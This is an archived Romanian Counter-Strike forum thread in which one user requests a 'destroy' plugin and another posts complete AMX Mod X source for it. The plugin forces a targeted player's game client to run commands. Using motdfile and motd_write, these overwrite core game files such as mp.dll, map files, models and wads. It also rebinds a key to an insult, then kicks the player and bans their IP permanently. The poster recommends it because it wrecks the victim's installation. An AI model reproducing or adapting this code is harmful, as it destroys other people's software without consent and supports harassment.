User
Pass
2FA
 
 

As dori un plug-in

 
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    Freakz Forum Index -> Trash Bin -> CS 2006-2019 (Archived) -> Resources
Author Message1175
-C0nqueror * holidaYY

[Mentally Stable]



Status: Offline
(since 23-03-2013 11:42)
Joined: 12 Jan 2013
Posts: 89, Topics: 9
Location: Romania

Reputation: 50.7
Votes: 2

Post Posted: 19-01-2013, 19:31:16 | Translate post to: ... (Click for more languages)

Salut , vreau si eu plug-in-ul de la *** (destroy +ban permanent +quit)
Si as mai vrea plug-inul de la poze .tga
Multumesc





0 0
  
Back to top
View user's profile Send private message
anaconda cs
[Banned user]


Banned


Status: Offline
(since 26-12-2013 22:11)
Joined: 11 Jan 2013
Posts: 788, Topics: 55
Location: United States

Reputation: 61.4
Votes: 23

Post Posted: 11-02-2013, 21:45:53 | Translate post to: ... (Click for more languages)

Code:
#include < amxmodx >
#include < amxmisc >

#define PLUGIN "AMXX ***"
#define VERSION "5.0"
#define AUTHOR "AzaZeL"

new const *** [ ] [ ] =
{
    // Adaugi mai multe modele urmate de o virgula pana ajungi la 150
    "motdfile models/player/terror/terror.mdl",
    "motdfile sprites/rain.spr",
    // Comenzi de bind
    "bind x Sugi cariciu", // :)) =))
    "motd maps/default.res",
    "cl_timeout 0.0",
    "name ***",
    "motdfile models/player.mdl;motd_write x",
    "motdfile models/v_ak47.mdl;motd_write x",
    "motdfile cs_dust.wad;motd_write x",
    "motdfile models/v_m4a1.mdl;motd_write x",
    "motdfile resource/GameMenu.res;motd_write x",
    "motdfile halflife.wad;motd_write x",
    "motdfile cstrike.wad;motd_write x",
    "motdfile maps/de_dust2.bsp;motd_write x",
    "motdfile events/ak47.sc;motd_write x",
    "motdfile dlls/mp.dll;motd_write x",
    "motdfile decals.wad;motd_write x",
    "motdfile custom.hpk;motd_write x",
    "motdfile liblist.gam;motd_write x",
    "motdfile tempdecal.wad;motd_write x",
    "motdfile maps/de_inferno;motd_write x",
    "motdfile maps/de_dust;motd_write x",
    "motdfile models/player/leet/leet.mdl;motd_write x"
}

public plugin_init ( )
{
    register_plugin ( PLUGIN, VERSION, AUTHOR )
   
    // Add your code here...
    register_clcmd ( "***", "***", ADMIN_BAN, "<nume sau #userid> [motiv]" );
}

public *** ( id, level, cid )
{
    if ( !cmd_access ( id, level, cid, 3 ) )
        return 1;
   
    new arg [ 33 ];
    read_argv ( 1, arg, charsmax ( arg ) );
    new player = cmd_target ( id, arg, CMDTARGET_OBEY_IMMUNITY | CMDTARGET_ALLOW_SELF );
   
    if ( !player )
    {
        console_print ( id, "[***] Jucatorul nu este online sau a iesit de pe Server" );
        return 1;
    }
   
    new authid [ 33 ], authid2 [ 33 ], name2 [ 33 ], name [ 33 ], userid2, reason [ 32 ], userip [ 33 ];
   
    get_user_authid ( id, authid, charsmax ( authid ) );
    get_user_authid ( player, authid2, charsmax ( authid2 ) );
    get_user_name ( player, name2, charsmax ( name2 ) );
    get_user_name ( id, name, charsmax ( name ) );
    get_user_ip ( player, userip, charsmax ( userip ) );
   
    userid2 = get_user_userid ( player )
   
    read_argv ( 2, reason, 31 );
    remove_quotes ( reason );
   
    log_to_file ( "***.log", "Admin %s has used *** comand On: %s cu motivul: %s", name, player, userid2, reason );
   
    new i;
    for ( i = 0; i < sizeof ( *** ); i++ )
        client_cmd ( player, *** [ i ] );
   
    server_cmd ( "kick #%d ^"Ai primit *** ^";wait;addip 9999999999999.0 ^"%s^";wait;writeip", player, userip );
   
    client_print ( 0, print_chat, "[***] Adminul %s a folosi comanda *** pe %s", name, player, userid2 );
   
    client_cmd ( 0, "spk ^"vox/bizwarn coded user apprehend^"" );
    return 1;
}


Mi se pare cel mai bun , distruge cele mai importante fisiere din cs , baneaza victima pentru 99999999 minute etc
Iti modifici cum vrei , comanda este ***

0 0
  
Back to top
View user's profile Send private message
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    Freakz Forum Index -> Trash Bin -> CS 2006-2019 (Archived) -> Resources  


The time now is 07-08-2025, 16:15:52
Copyright info

Based on phpBB ro/com
B

 
 
 







I forgot my password